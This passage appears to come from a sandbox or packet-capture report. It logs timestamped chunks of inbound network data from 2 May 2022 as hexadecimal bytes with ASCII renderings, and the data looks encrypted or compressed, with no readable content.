                                                                                  2022-05-02 11:02:01 UTC18INData Raw: 36 b9 f4 4c a7 3f f6 cb 12 4a c2 2d a7 da 18 5d dc 76 b3 ba c9 08 3b 20 b0 f3 0e 56 f0 c5 82 46 11 aa 69 99 92 cf d7 b9 18 f9 b4 9b 6e 2e 29 0e 86 74 46 7a 5f ad 05 4c fd 34 81 85 31 ba b5 1f da 5d 01 84 a9 c0 92 01 f5 65 34 12 c9 84 dc fa 1b 59 0a fc 9f d2 c1 08 4c 29 be f8 fa 49 5d f8 59 0d 1d 96 5f bc 9f d3 5b 82 de cb 37 0e 1e 78 e2 f4 e4 97 3a d3 8f e5 d4 92 74 6d 31 15 fe f7 65 0d db f2 66 aa af 5c b1 77 b9 9e 43 7b 0b 93 06 9a dd 34 22 9d 19 fa 37 f6 bc ba c0 04 2f 25 7e 99 71 a0 0f bb c0 ca 99 05 e0 cf 47 44 d5 40 5c 69 1d 04 bf 89 98 4d 15 f3 00 13 2c ce ce f0 cb d9 e9 49 62 5d 9c 37 36 32 56 4d 0e cd c7 0c 52 3d d6 8b 54 c5 3e 0e df 8b ba ad 9a c4 59 7e 87 76 cf 8a 99 42 b4 51 12 29 9c d1 ba 02 51 c3 8b b3 97 fa 32 e9 b8 b4 8f ef 3f 52 61 46 2e
                                                                                  Data Ascii: 6L?J-]v; VFin.)tFz_L41]e4YL)I]Y_[7x:tm1ef\wC{4"7/%~qGD@\iM,Ib]762VMR=T>Y~vBQ)Q2?RaF.
                                                                                  2022-05-02 11:02:01 UTC20INData Raw: 5c f2 8c af ac 12 b4 ea be ec c6 0f c9 ce d5 2f bc 9d aa 1d 07 ff bc 5c d7 eb 78 0e 9a f0 33 13 e3 74 a0 32 34 5a 25 7b ce 85 a5 45 13 dd 9d 0e af d0 87 be 52 32 f5 17 24 95 66 dc 7e bc ec 13 cc b8 66 1e 1b 67 ef cf 7e fa 5d b4 ea 5e 0e dd 4b 15 0d 0e e2 41 73 82 a6 94 60 b5 7a 81 7f 16 c5 12 9a 83 d7 e3 ec 5e 80 13 b3 a7 3b 44 71 75 5d b9 a7 80 23 87 bf 81 b3 e6 bf db 7d 8e b2 3e b7 1d 16 84 1a 9a 68 4a 04 6a ab 4f e6 1e 46 df 99 68 b8 48 7f 8d f6 37 2d 2d b4 19 49 1c 93 7f 74 b9 9d cd 75 f3 64 bb 3e 8e b9 27 74 36 77 fe d1 2f 6f 41 e6 d2 16 ec f0 73 87 26 c6 e7 c7 71 69 c6 5b 61 d8 ef c8 e6 9d ba 97 c6 82 20 90 fc 68 63 93 92 f4 50 16 4b 4b d9 ba dd 2e da 4e 60 e9 b2 45 13 77 5e 8c 40 6e a7 9b 57 2c e1 8e ed 88 b8 36 8e 60 8d 20 fe 45 d1 7f 1d db ff 63
                                                                                  Data Ascii: \/\x3t24Z%{ER2$f~fg~]^KAs`z^;Dqu]#}>hJjOFhH7--Itud>'t6w/oAs&qi[a hcPKK.N`Ew^@nW,6` Ec
                                                                                  2022-05-02 11:02:01 UTC21INData Raw: bb b0 3e f8 8e c2 54 ef e8 e4 1d 77 7a 4e 87 cc 28 fa c4 d5 1d 71 a3 84 d6 d9 93 43 c7 5f d0 49 8a 2f 0a c3 14 00 2e bc ad 4f 39 1b 8e e8 f5 6d 46 a0 f4 bb a6 fc 95 60 c5 94 9d f1 8a 10 87 e2 91 91 db 75 82 b6 c2 b3 e0 a6 56 d9 a2 6c 8c 88 24 da 2e 98 96 17 fc cc e4 a1 3c 67 66 e4 55 9d 42 50 28 f1 b3 e3 c7 c8 90 ec ae f6 a4 61 5d 37 bb 6b 35 f2 32 0d 4b de ce 74 5d 84 ca 34 0e 1c 5a 81 28 ce fc 26 f0 02 20 f1 33 d8 b1 c8 a3 3a 2d b6 78 ba 12 40 5d a2 ce e2 14 89 c2 a2 50 cb 2f 87 32 c1 e9 8d 20 ce 99 e9 c8 5a 13 5c 6e d4 41 e0 da a5 51 37 4a dd 39 33 fb 8d 22 ed 26 d1 48 a6 9a bf 6f f6 a4 c8 db fe cc 46 0c af 1a b1 ec 85 ee 6a 57 ed 29 b7 c2 68 0f 6a cb 56 45 1b a7 c8 76 9d 7a a3 f6 eb 58 eb a0 df 31 16 a7 9c ae 53 65 7b 8c 97 ed 07 9b 05 1a ec 10 8b 0b
                                                                                  Data Ascii: >TwzN(qC_I/.O9mF`uVl$.<gfUBP(a]7k52Kt]4Z(& 3:-x@]P/2 Z\nAQ7J93"&HoFjW)hjVEvzX1Se{
                                                                                  2022-05-02 11:02:01 UTC22INData Raw: 27 23 07 dd 6b a4 93 8f 0c f6 4c ae 16 15 ca 2e ec 86 30 aa f9 e6 47 eb 7f 7c 69 d4 49 8f 95 8d 9e bd 2d 05 f2 a2 6d 66 fd 9e ec 51 92 92 10 8f 25 84 c6 f4 5c 07 1a 73 05 c1 ad 85 aa 95 4b 4a 0b 25 f5 ed 38 52 86 85 be b4 99 0b c1 12 f1 9b 9a 96 28 2f 55 c4 16 9e 09 1b 7e 2b 98 ac d5 94 de 5a dd 6b 80 6f dd fd 41 1f 56 2a d1 c9 8f c8 e6 97 a6 46 e7 e2 fc e9 61 8b ac 78 81 eb 19 22 df 4c 80 7c 0b 6b ab 22 95 10 23 82 26 fa 9a 4d 47 a4 7a 31 25 a2 8b 21 ec f7 eb db 88 ab 9c 4c 89 3c 39 51 25 9b 35 b6 af b9 89 02 12 28 0c 55 cb 9d 93 3d 61 85 95 e9 77 fb ed 16 74 e3 1e c6 fa 9e c9 f7 76 69 f1 3a ad 4e 7f 53 a4 e5 6c ed fd 23 cf 72 64 d1 b5 f9 6f e0 75 1e f3 1c 16 e8 cd 10 69 9b ab 1e cf ca f0 2d e8 d3 0e b8 87 0c de ec 79 68 22 14 9a f0 bd 35 17 bc 8e 23 26
                                                                                  Data Ascii: '#kL.0G|iI-mfQ%\sKJ%8R(/U~+ZkoAV*Fax"L|k"#&MGz1%!L<9Q%5(U=awtvi:NSl#rdoui-yh"5#&
                                                                                  2022-05-02 11:02:01 UTC24INData Raw: 83 ae 8f c9 6a 48 b8 6f a1 a9 de cf 93 b9 eb b9 a2 25 07 06 7c 1d 00 50 98 ba 18 e4 53 d4 a0 86 a3 dc 93 60 b5 57 a0 7f cd b1 d6 a8 ed 2d aa 1c b3 72 08 4f 60 f6 96 55 5f f5 06 4d 19 17 32 9a c7 94 68 8a a0 23 fd 5f 55 45 cf 2e a8 24 46 d0 0f d8 7e cd fe 45 c4 17 7a 96 7d 51 38 bc 7d ed 6a c1 72 ac 26 06 f6 6e 41 39 bd ac a6 cd fe 85 af e7 af 51 ac 05 24 fa 1a 83 08 23 4e 4c 13 2b d2 8b fa c8 13 3b 96 a3 ca 72 f1 bc 63 7c 69 e0 43 f6 63 cc f0 0e 47 c4 d6 91 2c 81 e7 78 bd f9 a0 77 bd 9d 80 97 b6 7b 48 1c 13 ea 64 e7 5e 44 a9 87 ad 53 b6 3c 66 e6 1a e1 44 db 4e 13 74 be 96 fb 6d 04 40 18 d8 d3 05 32 0f ef 9f ec c8 bf 0d 57 fd 2b 52 af 10 4d b8 ac 04 70 6d 5d ad e9 78 2a 41 92 87 2c 8c 22 d4 78 0c 46 57 4e 33 72 d6 4b 84 d0 a1 eb fa a8 f9 46 9a c5 9e d7 5b
                                                                                  Data Ascii: jHo%|PS`W-rO`U_M2h#_UE.$F~Ez}Q8}jr&nA9Q$#NL+;rc|iCcG,xw{Hd^DS<fDNtm@2W+RMpm]x*A,"xFWN3rKF[
                                                                                  2022-05-02 11:02:01 UTC25INData Raw: b3 51 62 26 a9 18 75 d8 99 5e c0 53 06 93 8b f7 57 4c b3 04 e8 fe aa 49 a3 80 94 2c 79 30 37 96 3b eb af 93 63 3f 44 de c4 a0 3a 25 c8 5e 80 82 29 81 36 58 52 0d 76 6e eb 0c b1 02 b8 cc ea 49 04 33 ac e5 8d c8 be c7 89 66 f4 71 31 4d 55 df bf eb 83 79 1a aa 73 60 37 e8 c6 75 81 28 16 6b 46 0d ef fd d1 4a bf 1b e1 bb 25 a4 87 15 eb 76 a0 7a 7b f3 d1 d1 ee c8 84 af 48 13 ee 65 24 fd d6 b6 ce 95 2b e2 f5 5a be 26 d6 8e 7e a6 73 92 a5 15 84 31 a3 4d ba 29 93 64 df 60 f8 78 62 6c c5 bc d0 ab 77 45 db 7a a6 e5 ac 39 e2 c7 a1 a7 4e e3 83 f0 3d f7 11 b5 22 8e 56 67 8f d3 97 55 a5 01 29 c5 62 54 77 22 bc 4b 07 a8 c4 8e cc 27 e3 92 05 04 44 33 e2 f4 86 0c 96 c8 80 58 d1 12 5a 2b ee 31 00 ca e1 43 d0 11 b4 97 b6 d3 bb cf 01 b1 4d f9 11 26 62 b5 94 7d e0 58 5d c6 8c
                                                                                  Data Ascii: Qb&u^SWLI,y07;c?D:%^)6XRvnI3fq1MUys`7u(kFJ%vz{He$+Z&~s1M)d`xblwEz9N="VgU)bTw"K'D3XZ+1CM&b}X]
                                                                                  2022-05-02 11:02:01 UTC26INData Raw: 07 ee f6 dd 3c dd ae 75 ed 10 e4 99 33 3d 4c 63 62 cb 6b de 5e 5d b5 df 9e 40 3a 32 c0 79 62 ce 1e 48 c3 8a a2 f6 9f ef bd cb 6d 0e 9a c9 93 57 11 11 54 e8 fd d6 f4 f6 99 ad c9 4f 71 83 eb 97 b4 7f 06 c6 0f 43 4d a4 b3 49 40 a4 2f 71 c5 d2 eb 53 43 0d 4e cf d5 97 5e c0 49 73 41 f0 3e 30 b9 19 3a 76 39 a8 7b 0f 82 0e 7b 98 7c 13 22 6b ad 35 fe 91 cc c5 36 cc b4 d1 c7 12 bf be ac 34 d0 59 fc 7f b0 74 be 46 82 ad c9 fd 12 8c 0d 89 8a a0 90 2f 69 16 0c 58 61 4a 99 47 c4 0d b8 f0 ef db cf 86 87 c0 34 d2 c8 0b bf 0d a8 b9 1b 64 a4 94 b3 23 5d 7b 35 81 88 ad 93 f6 00 f4 b3 fe e5 94 3f c2 6f 0f 56 77 50 73 ac d4 bc 0a b2 df 63 c8 72 36 14 07 34 d5 d5 84 81 d2 57 78 a8 27 c5 27 a6 ad 95 8f c0 89 7c e9 8f bf 64 d6 ef 67 81 8c aa e1 19 30 ec c4 d6 af 71 9c ed e8 aa
                                                                                  Data Ascii: <u3=Lcbk^]@:2ybHmWTOqCMI@/qSCN^IsA>0:v9{{|"k564YtF/iXaJG4d#]{5?oVwPscr64Wx''|dg0q
                                                                                  2022-05-02 11:02:01 UTC28INData Raw: 78 c6 47 f0 09 37 2c ac 01 4a 37 53 f7 fb 59 82 c6 b8 35 cb 45 07 4c 6e 51 7a c6 15 90 67 81 71 02 fe 46 57 13 3a 31 1d 65 1b 82 8d e4 dc 2e 1d b5 53 66 67 72 f8 24 39 98 c5 25 fe ed 63 99 c7 d2 bd 1e c0 18 83 fc 30 47 7a a2 22 64 59 d8 1c 06 ac 74 01 d4 63 e6 7b 16 c4 35 c3 0f aa d5 d9 bc 71 10 28 6b ae 5b 50 72 26 32 64 1b b6 3e b3 d8 8d 76 89 80 27 d1 68 eb 04 26 0c 65 b9 0b f8 50 0c 3c 51 0b e1 6d 30 ba fe 75 46 38 63 7f b1 12 8f 3d 9b 4a e0 9f c7 76 2d d5 35 59 20 ac f5 76 b7 66 d7 89 32 3d ab 88 93 42 f6 42 0b d1 1a 5e 1c 44 79 ba 35 98 7c e2 84 83 ce e6 57 74 c7 0a 65 6b 0a e7 b6 0e c4 e2 0d e1 e1 a0 95 52 8e 8a 56 b7 2f 6a 6f d3 23 47 65 28 f8 b5 f1 52 62 f0 b0 4c e6 8b 38 8f 3f 78 4b fa 65 12 0e c6 a3 9c 69 e8 dd a1 e8 99 a8 aa 6a 0c 64 36 00 1c
                                                                                  Data Ascii: xG7,J7SY5ELnQzgqFW:1e.Sfgr$9%c0Gz"dYtc{5q(k[Pr&2d>v'h&eP<Qm0uF8c=Jv-5Y vf2=BB^Dy5|WtekRV/jo#Ge(RbL8?xKeijd6
                                                                                  2022-05-02 11:02:01 UTC29INData Raw: 74 43 c4 b5 c2 46 b9 bc 7e 2b fb 28 48 9b 5b e1 1d fa 03 c9 d4 e6 a1 25 29 46 70 a6 c5 d8 ed f0 c9 8b 55 79 da 0e df ca 1f c2 39 75 cd 3d ab 1a 7d e2 f3 5d ab 24 42 22 d9 a1 a8 e4 66 5b 17 92 a2 4f d1 51 03 4a 97 1f 9b 04 b6 d6 6f 0b c9 c8 e2 fc f4 2d 2c 5b de 9b a8 05 29 83 dc 41 94 ea 4a bf 05 7b a5 c5 66 d3 27 0d fe d8 12 fe be 28 2e c6 f9 2a d9 a5 91 f1 64 5d 9b f3 8f 48 3a b4 64 11 90 7e 94 18 6b 0f da 0c 20 04 c2 91 a5 86 ed a9 3d a9 8a d5 81 a4 10 e8 3c 94 bf f0 61 02 83 20 02 8a 16 2d fd a6 af 06 2e 9e fe 87 70 50 15 77 bf 6d 6b 02 d7 cb 16 3d 72 3b 79 73 89 2f c3 60 a6 5d 12 20 43 79 01 3f 56 06 c1 2a 24 7d ed 78 0f b7 66 34 64 71 f7 0a 2b 86 87 9f 98 e2 05 c4 a3 49 10 16 af 96 33 d3 81 23 5a 52 46 d8 d4 b7 43 23 f4 79 ee d0 f4 7b b5 2e eb 97 5e
                                                                                  Data Ascii: tCF~+(H[%)FpUy9u=}]$B"f[OQJo-,[)AJ{f'(.*d]H:d~k =<a -.pPwmk=r;ys/`] Cy?V*$}xf4dq+I3#ZRFC#y{.^
                                                                                  2022-05-02 11:02:01 UTC30INData Raw: 5f 20 19 d5 5f bb b2 f6 f1 fb 68 e6 79 28 ab 27 28 fd d8 89 34 cd 54 79 2d 7f 03 e8 06 ff 13 ce 6e dd d4 5f 8d b0 4b 84 06 0d ab 93 6d 08 78 5a cf 8b a9 3a a7 42 e4 b1 91 2d ab 3c 6e 44 51 1b 0e 20 aa af ae 66 fe d0 7c 42 a0 8a af 57 5f 95 b8 ec c4 22 e8 2e 60 00 e5 16 f4 12 1d fc db da 9e 4e 21 33 2a 61 13 50 47 d1 15 a8 26 ee bf 22 f8 21 c8 cc 33 b7 23 ef 6f f0 48 24 75 6f 12 86 fe 00 fc f0 06 08 44 dc 29 0c 2e 7d df ac 19 3d 54 b7 2d 63 81 fc 46 8f ae 4e 80 24 4d 9a 9b 4a 2e 78 1d 2e 3f 5a 37 8f eb 6f 7c 4f 6a 50 34 7d 4b 1f 9a ee c5 25 1c 6c 3d d3 0b c6 c7 8f d2 08 e8 d2 5b 38 fa fc a1 4f 5d 34 d3 95 d3 b1 06 c5 f7 50 a3 6e da 35 b8 2c 67 27 90 86 b4 3c 50 30 c0 94 bc 72 bf c6 a1 f0 7d a6 af d4 e7 97 b2 b2 fb f2 82 7a 0b 1f 06 60 69 88 c9 bc 15 03 5b
                                                                                  Data Ascii: _ _hy('(4Ty-n_KmxZ:B-<nDQ f|BW_".`N!3*aPG&"!3#oH$uoD).}=T-cFN$MJ.x.?Z7o|OjP4}K%l=[8O]4Pn5,g'<P0r}z`i[
                                                                                  2022-05-02 11:02:01 UTC31INData Raw: 28 a6 8f 26 c9 78 a9 67 4b 3b 08 2f 8d ba e2 64 44 43 28 d7 bc 5d 62 ad 65 a9 96 87 01 2b 0b b7 55 51 cb f5 af c5 6a 98 7f a9 81 eb 04 d9 56 8a 2b 0d e3 d0 ad a2 58 43 fe a4 fe a4 b4 ab f2 22 c7 77 4c 77 2e c2 6b e0 e2 58 4e 84 c5 f0 c0 81 78 ce 13 41 20 41 9f f8 2d 2d fe af 8f bc df cb b6 b5 3b 3d 40 8e 27 d8 c4 aa 1d 0f dd c3 af d6 cd bf b3 a7 a3 eb 24 dc 28 9e 5a 94 5e 7c db cd 10 57 fd 4f 93 91 76 dd c3 7d a7 41 fa dd ac 40 69 23 17 33 80 2a fe 95 05 e9 89 e1 f0 3d 3e 9c 29 ce fd 64 ef ad 77 b9 9d 21 fc d4 d7 f9 4c 3b 8a c0 2d 00 7e d8 3e f5 a3 9c 38 90 b9 ac 7e 2a 71 25 25 25 2d ac 53 94 75 0b 49 7b 6b 4e 72 e3 e0 0c b8 fe 7b 59 4f ac 01 bf d6 51 0b b7 59 98 9a 6b e2 9d c9 cc 05 5d 1f 6a 89 9e fe f7 42 57 a6 7a 06 7f a3 ce 87 e8 2c 28 b4 c9 11 a9 47
                                                                                  Data Ascii: (&xgK;/dDC(]be+UQjV+XC"wLw.kXNxA A--;=@'$(Z^|WOv}A@i#3*=>)dw!L;-~>8~*q%%%-SuI{kNr{YOQYk]jBWz,(G
                                                                                  2022-05-02 11:02:01 UTC33INData Raw: 5b cd f1 de 5a d9 86 ad 42 e4 1a a4 92 dd 4a d8 05 d1 08 bd c9 ae 81 1f 78 a4 ba d3 62 e8 5d 98 e9 1e 43 4a 29 36 c0 1b f7 35 0c d9 39 7f 75 bf ef f2 78 31 7b 1f 4f 69 44 42 87 c2 5f ac 5c 65 3c 0f 02 e2 db 03 f2 8c ca f5 df 5d 82 89 bf db c4 14 22 41 c1 01 58 11 06 dd 55 b3 c4 2b 12 43 99 a8 58 40 a0 d2 2c 2a 79 40 8d ae e3 19 95 dd 84 ad 85 3a bb 85 71 00 3a 76 7d e7 49 37 14 0e 50 38 ec 4b 85 b0 84 f4 72 0c 67 2d eb c2 95 4e 5c e1 87 9b 99 d9 eb 6c b5 92 72 c9 c2 cf 2d fe 2f a7 98 36 ec 03 11 59 6b e2 50 ff 2c ec 1b 30 32 cb 73 90 25 96 db 7a 87 eb 88 eb 13 5e f9 d2 7c 81 8e e0 7b df ef 0f 76 98 2e 1b 35 eb f4 48 ba 28 3b 90 eb 02 e1 4e d3 ec 54 55 34 e8 db ff c2 52 3d 5c 4d 41 98 03 4a 78 fd 6f 52 0d 35 6b 25 5e b1 31 37 e0 e0 95 37 ac 87 ab 61 16 17
                                                                                  Data Ascii: [ZBJxb]CJ)659ux1{OiDB_\e<]"AXU+CX@,*y@:q:v}I7P8Krg-N\lr-/6YkP,02s%z^|{v.5H(;NTU4R=\MAJxoR5k%^177a
                                                                                  2022-05-02 11:02:01 UTC34INData Raw: 9a dc ad c4 8a d9 55 f8 57 9a af 4a 4a ec 65 19 78 eb 57 e6 9f 66 a4 63 c0 e4 21 f5 c9 6f 8e 08 d3 71 62 79 f6 0f c4 7d 05 51 8b 73 22 7f df 0e 39 47 20 89 4c 63 24 b4 a8 81 e9 c5 b0 97 a3 70 cd 85 8d 4d b0 45 47 51 df 1e cf d9 1f d2 29 6f f4 50 42 d1 d9 f8 4e 75 54 83 d8 45 a4 46 50 91 49 83 e5 42 e9 ec 83 36 c5 3b a7 18 34 2c 0c 0c e0 90 a5 85 f0 e8 ed 94 17 30 97 eb f3 56 5b a5 2c 90 51 d3 0e df c3 52 7e 57 d8 4a b8 8b 9f 68 65 35 be 5f 1f da ad a6 b0 f1 89 ef a6 25 58 e7 c9 3b 8f 24 2a b6 ca 73 8d 5e d6 05 b7 94 93 6b a5 65 fa c7 4f b8 f2 94 8c bf 90 91 be 23 67 53 39 ec ec 18 39 ca 8f c1 58 a6 6f a8 d8 46 d2 d5 da c4 33 dc 25 57 37 a7 95 4e 6b c7 ea 21 c4 7e ef 59 43 52 bb d3 f3 78 32 01 f7 df 0f b0 db 21 67 1e 71 1c 1a 25 8b 4a cd 48 7f 55 50 d9 96
                                                                                  Data Ascii: UWJJexWfc!oqby}Qs"9G Lc$pMEGQ)oPBNuTEFPIB6;4,0V[,QR~WJhe5_%X;$*s^keO#gS99XoF3%W7Nk!~YCRx2!gq%JHUP
                                                                                  2022-05-02 11:02:01 UTC35INData Raw: 58 ac b4 8c 8c f6 36 1f d7 81 37 d9 55 23 6b 94 27 21 2f 64 d0 4e c9 09 31 a1 e7 6e cb 79 f0 27 45 66 8b b9 09 36 23 ac 49 4d c7 d0 b5 94 58 92 2b 0c 50 6f 53 fa 37 9e 7a c0 ea e7 a2 3c 1e d6 9a 99 31 5e b9 28 c3 f6 a9 20 9f 00 3c 7d f8 ea e8 5f bf e9 fd 93 79 87 21 75 b0 52 8f 38 60 51 fe 43 e3 18 95 e1 19 af a5 7f 58 bc 9b e8 d5 cc 5f 8b 7d 34 f5 23 ee 66 1f 52 af 06 12 bc cd 00 fb 54 1e a2 eb f7 4b f0 39 7a 5a 72 08 98 4b 50 43 c5 b4 83 89 9d 43 d3 4d b8 ce 3d b8 bc ec f3 8f db ee f2 ed fe c6 03 86 bd fd 30 21 0a a3 89 b9 be c3 f2 f4 8b f8 2c 4a 89 49 db c2 c7 7a 2b 44 c5 af 7d 10 c8 e2 7f a8 37 ac 8a a3 66 ab 46 b0 e1 75 7e 31 9e 52 19 34 02 cb 6f e6 4d d1 71 a2 47 74 2f 40 04 18 dc fc 80 4e 25 e8 09 c2 5e 8b cd 3f 9a 6a dc 97 f9 14 f3 6e ab ae a8 df
                                                                                  Data Ascii: X67U#k'!/dN1ny'Ef6#IMX+PoS7z<1^( <}_y!uR8`QCX_}4#fRTK9zZrKPCCM=0!,JIz+D}7fFu~1R4oMqGt/@N%^?jn
                                                                                  2022-05-02 11:02:01 UTC37INData Raw: 7a 04 fe ee f6 0e 65 a7 ca 08 aa db 84 85 1d 65 74 a9 77 57 5a 1b 2d 86 44 19 5e bd 0a 9e 20 76 da a1 6e 55 ea d5 4b 61 dd b9 3c 14 0e b0 f2 07 27 0a b9 e6 c9 7c 58 97 f9 82 8c 8b e9 7a 57 4b ba 0c d4 dc dd 94 c5 56 1f d7 bb 03 36 6d e9 f1 61 05 74 ed 4e ff b8 fd bb d0 d8 10 93 2c a5 e8 82 b8 62 a1 01 37 5c 9b 23 a5 1c 9c 63 18 f2 e0 73 ba fc ca f1 9c 36 e8 7b 18 00 6d b6 6e 34 ec 51 00 7b 82 ba df af 80 a4 11 ba 9d e9 61 2f 05 f5 0b 63 af 31 ab 7e 1e d6 8c cb 47 f9 fe 8f 29 5a d1 85 d3 af 41 d8 6f 55 c9 cf c2 5e c0 c8 90 2c 29 f0 00 40 04 89 37 be c1 48 97 aa 6e 13 d9 74 50 b9 92 c8 61 87 25 10 7f 3e 36 c2 84 80 a9 5f 90 37 f5 32 c6 95 f2 71 10 a2 be 65 40 ba b2 7f 01 5c 18 9f 80 53 8c d7 bb c0 da 4d 26 fa fa b6 e9 1a 19 87 9c e0 cd db a7 a8 cc e0 55 83
                                                                                  Data Ascii: zeetwWZ-D^ vnUKa<'|XzWKV6matN,b7\#cs6{mn4Q{a/c1~G)ZAoU^,)@7HntPa%>6_72qe@\SM&U
                                                                                  2022-05-02 11:02:01 UTC38INData Raw: 4b 53 48 b1 d8 ae ba bc 84 2a 0f 54 94 21 3d 7a db 22 3b 2f ef cb dc 61 b0 75 df 9e f3 2b cb 6f b1 36 2c 25 cd 17 dd f5 f1 0a 53 cf 5f a7 d8 aa 68 68 1f ee 86 8a 46 39 c2 9a 90 c3 e4 19 46 c5 98 a8 59 12 81 bf a1 ee cf dd 03 a4 fa e6 07 8b 62 54 73 5e 99 b3 c9 4f 85 dd 63 cf e0 0c 62 83 b0 0d 8f 86 be 8a 8a 10 e9 c9 8b 21 60 90 2e dd 89 66 78 62 63 d6 f8 b1 6b 02 35 5e a5 84 dc a8 1b 65 1d 8e e6 10 48 e3 f2 2f 5b 0d 18 cd 62 96 67 fe 09 1d 0a 79 0a c5 64 70 ed 00 30 34 77 84 98 ef c5 f9 50 14 9b 21 5f 1a d2 f0 53 d8 f8 55 b8 0b a2 3a 14 99 71 3f c6 1f 10 6e cb 24 74 5c f4 2f 4e 85 a4 e4 ba 39 dc 51 be 3c f6 77 6d fe d5 67 b1 f8 01 10 0a 70 6e 74 8f 83 fa 4f 1c 1b 19 f7 f6 38 31 b8 0d 7e b6 00 af e6 cc 92 b4 7f 00 8c dd 11 3b 05 d2 bd 34 2b f1 84 c6 90 cf
                                                                                  Data Ascii: KSH*T!=z";/au+o6,%S_hhF9FYbTs^Ocb!`.fxbck5^eH/[bgydp04wP!_SU:q?n$t\/N9Q<wmgpntO81~;4+
                                                                                  2022-05-02 11:02:01 UTC39INData Raw: a7 36 cd 35 6e 8d 33 73 71 ec bf b5 4c c2 92 2f d0 0c b0 2e db 5b 51 bd dc 83 bc 4c fe b3 7f 5b 81 fa 2c d2 96 b9 96 5f 6b 01 64 bd 3f 6d 02 dc b4 4d ce 78 e7 62 bd 4c c6 ec 33 b4 a0 78 31 b8 dc 84 40 3c 75 fc 57 21 34 69 c7 fd 70 bf d1 8f 34 3f aa 73 f1 2a 75 ef 18 f9 1d 1a b1 82 9a 10 45 8f 7e 6c 82 70 d2 f9 07 6f 63 52 dd f6 01 49 ab 02 a4 21 91 09 17 ff 0e 7b 1a 25 c0 00 3b bd 64 df 7a 5e be af fb 2f ad c6 15 e6 43 5b 38 b1 98 a0 2d 91 c2 9f 86 42 0e 82 8e 23 ec 07 16 f1 bd 61 26 27 ed 81 4c 13 31 e0 a0 90 25 9a 3e 06 fe f9 de 62 66 ba e5 70 8d 96 df be 15 77 46 42 44 f0 88 d6 5b 50 5c e1 8d e5 f7 61 e5 25 69 c2 e8 97 1c 91 c7 4a 5f ab c3 5e d4 ba 75 2d db 5d 0d dd 6b d3 9d 0b 67 60 f2 11 74 97 c3 79 77 e4 7b c2 78 e3 35 fd 2e 33 04 cf b1 df a8 cc 80
                                                                                  Data Ascii: 65n3sqL/.[QL[,_kd?mMxbL3x1@<uW!4ip4?s*uE~lpocRI!{%;dz^/C[8-B#a&'L1%>bfpwFBD[P\a%iJ_^u-]kg`tyw{x5.3
                                                                                  2022-05-02 11:02:01 UTC41INData Raw: ef a8 6d fa 2f c1 96 4c b6 9d d2 b7 f3 90 a9 3d 80 e6 c2 ef d9 71 d1 59 0c 85 34 1a d7 d0 1f 89 5e 14 2c e2 a7 1a 7f 3e 23 01 39 ca aa 8b 9a 0e 48 80 7f 39 8f d3 f0 23 82 b5 00 da 2c 54 c9 0f 9f 33 b4 60 8a 44 61 ad f0 13 c7 18 64 12 e5 03 f4 ea c1 92 53 ec c0 0e b1 5e 57 26 51 32 86 b8 9b 84 4d b9 79 eb aa 4d 98 e5 0a 0b 3a 4f db cc d1 70 70 db 59 ef 5e 14 01 85 d7 bd a0 b9 a0 e2 c2 d3 75 d2 b7 66 39 ac 81 3e 50 c0 50 6e 7d b6 df ce 2b 2f 8e 45 48 d4 4d 98 57 fa 74 f9 08 3b a0 1a 49 48 d6 b3 29 ff 13 8f 0a 05 a7 aa 78 b9 d0 62 1b b0 ee 3c c5 ba 9a 04 0e 40 dd 06 45 20 34 67 b2 f5 ce 1c 07 21 58 a6 53 bc 6e ee 38 85 0b 7b 26 65 e6 6b 17 8a ec e5 7b fd f1 b7 aa 10 a1 a5 f1 91 38 81 d4 25 0f 5d a3 41 2f f1 68 4b a0 b1 cf 6e dc dd 46 90 4d 43 65 eb 11 e3 50
                                                                                  Data Ascii: m/L=qY4^,>#9H9#,T3`DadS^W&Q2MyM:OppY^uf9>PPn}+/EHMWt;IH)xb<@E 4g!XSn8{&ek{8%]A/hKnFMCeP
                                                                                  2022-05-02 11:02:01 UTC42INData Raw: 3d 7d 3a 6e 45 f3 c6 cd c3 cc 95 1f e3 84 35 50 c4 88 e3 8d 34 42 67 39 06 60 59 4a ef 26 4e 61 02 0f 31 5b c1 e1 33 93 5d 8b a3 21 9a f4 6e d2 98 f8 6e 9d 63 ec b5 9b f8 64 53 8b ce f1 03 a2 ab ad 95 ea 0c c2 ec aa ef 97 f8 f4 88 c4 a0 d5 bb a9 85 05 c5 9a b1 65 3c 75 8a 77 d4 7c 07 69 b6 45 db a8 31 fc 6e be df c1 8c 15 0f 1b de aa a0 03 de f4 10 c1 97 78 f0 0b 67 72 06 1d 9e 79 c6 48 f1 ad ce 6c 03 9c 0f c1 1d 78 1a a0 37 6b c4 5e b3 fc 1f ec 4b 72 e6 da 17 21 a8 7d 13 3c f1 50 3a 7f 21 fa b2 fd df 71 1b 37 47 50 31 f6 02 24 74 f5 7e 27 06 62 55 a6 db 98 98 44 4f 64 c1 71 ad f5 3b 1c 49 a5 3a 96 4b c5 c4 a3 43 bf ca b2 90 8d b2 f1 36 32 ac 75 2e 52 0a 22 82 55 1b 32 48 6b e8 14 ec 5f 30 86 e7 00 df 3f a4 45 29 df c7 2d e9 dd e1 e7 81 fc 22 d6 df da ac
                                                                                  Data Ascii: =}:nE5P4Bg9`YJ&Na1[3]!nncdSe<uw|iE1nxgryHlx7k^Kr!}<P:!q7GP1$t~'bUDOdq;I:KC62u.R"U2Hk_0?E)-"
                                                                                  2022-05-02 11:02:01 UTC43INData Raw: 86 ab a6 7c 68 aa bc 30 6b 58 7e ab 29 a1 d4 5e f6 e9 80 88 77 13 00 a0 fb b4 e0 80 6f e0 d3 81 bd 4c 68 98 48 9e 32 a0 37 99 6d 2c 66 c3 66 44 6c c2 2b d4 08 21 60 17 c8 ce 97 fb 70 a0 96 c5 d9 81 7f ba ac 6a 1a 36 ff ea d0 9d 94 88 0b 15 2a 61 fe 5d 22 e0 01 8d 20 59 92 5f 73 38 67 1f 92 25 da 11 17 c8 7f ee 27 6b 07 b9 bc 1f 62 b7 e7 a0 a8 e0 92 39 d4 19 93 04 24 24 f4 41 9c 4d 36 ac 9e 47 f9 30 90 3d d3 4f 95 35 12 2d 3d 19 85 d7 2a 49 b0 99 9e d2 0a 65 6c 65 b0 e3 ab 4d 83 a9 d1 6f 84 ee a4 2b 45 08 1c 89 ac 7c 0f a7 4c d7 b0 4e b7 1f 45 b5 79 fa c5 9f e0 70 cd c8 fb 6e 4e 48 93 24 3c 65 4b ce f8 32 36 a9 b9 d2 fd 48 a1 c6 3a a7 01 6a 60 53 98 ee 4a 2c 27 5e 09 85 25 0a 99 47 3d 9a 6a df 12 2e 3b 7e e5 64 02 71 